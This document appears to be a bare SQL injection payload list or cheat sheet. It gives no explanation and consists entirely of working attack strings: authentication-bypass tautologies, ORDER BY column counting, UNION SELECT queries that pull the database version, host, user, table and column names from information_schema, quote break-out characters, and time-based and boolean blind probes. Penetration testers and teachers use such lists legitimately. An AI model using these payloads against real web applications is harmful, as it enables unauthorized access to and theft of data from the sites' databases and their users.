+OR+1=1--
+ORDER+BY+1--+-
+UNION+SELECT+1,2--+-
+UNION+SELECT+@@version, database()--+-
+UNION+SELECT+@@hostname, user()--+-
+UNION+SELECT+table_name,2+from+information_schema.tables+where+table_schema=database()--+-
union select count(column_name),column_name from information_schema.columns where table_name=’tablename’
union+select+table_name,column_name+from+information_schema.columns+where+table_name='tablename'+limit0,1--+1
union+select+table_name,column_name+from+information_schema.columns+where+table_name='tablename'+limit0,2--+1
union+select+colomn1,column2+from+tablename--+-

'
"
`
[]=)
')
")
'))
"))

'+AND+1=1--+
'+UNION+SELECT+1--+
'+UNION+SELECT+1,2--+
'+UNION+SELECT+1,2,3--+
'+UNION+SELECT+1,2,3,4--+
'+AND+sleep(5)--
';WAITFOR+DELAY+'0:0:5'--
'(TRUE/FALSE CONDITION) THEN SLEEP(5)
SELECT SUBSTRING("harish",1,1) -> h
SELECT SUBSTRING("harish",2,1) -> a
SELECT SUBSTRING("harish",1,2) -> ha
' AND substring(@@version,1,1)=5

' and 1='1--
